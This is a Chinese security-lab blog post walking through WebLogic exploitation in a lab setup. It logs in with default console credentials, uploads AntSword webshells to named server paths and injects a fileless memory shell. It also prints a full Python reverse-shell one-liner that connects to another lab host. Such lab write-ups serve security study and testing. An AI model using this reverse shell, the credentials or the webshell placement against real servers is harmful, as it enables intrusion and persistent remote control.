网安引领时代,弥天点亮未来
方法1
1.部署漏洞环境
http://10.211.55.2:31307/console/login/LoginForm.jsp
2.通过默认密码登录后台部署war
账号:weblogic 密码:Oracle@123
3.可直接访问解析jsp文件,然后连接即可。
方法2
1.通过使用漏洞检测工具,判断目标是否存在漏洞。
2.进行文件上传
路径1(root用户)
/root/Oracle/Middleware/user_projects/domains/base_domain/servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war
上传蚁剑webshell
上传成功,访问路径解析
http://10.211.55.2:31307/bea_wls_internal/mt.jsp
中国蚁剑连接成功
落地位置
路径2(oracle用户)
/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/images/im.jsp
/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/css/css.jsp
为方便查看上传文件的具体情况,这里反弹一个反向shell
使用python方式反弹
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.211.55.7",12388));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("bash")'
nc监听获取shell
上传蚁剑webshell
命令行查看
上传成功,访问路径解
http://10.211.55.2:23392/console/images/im.jsp
http://10.211.55.2:23392/console/css/css.jsp
路径3(oracle用户)
/u01/oracle/weblogic/wlserver/server/lib/consoleapp/webapp/framework/skins/wlsconsole/images/yz.jsp
上传蚁剑webshell
命令行查看
上传成功,访问路径解
http://10.211.55.2:23392/console/framework/skins/wlsconsole/images/yz.jsp
最后,利用web logic反序列漏洞注入中国蚁剑Filter内存马(不落地)
中国蚁剑成功连接
文件管理无文件落地
注意:不同环境的jdk差异上传后的文件解析存在不同的问题。条条大路通罗马,攻击利用可以多思路,骚操作,能到达出其不意的效果。
知识分享完了
喜欢别忘了关注我们哦~
学海浩茫,
弥 天
安全实验室
原文始发于微信公众号(弥天安全实验室):Weblogic漏洞之中国蚁剑webshell利用
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论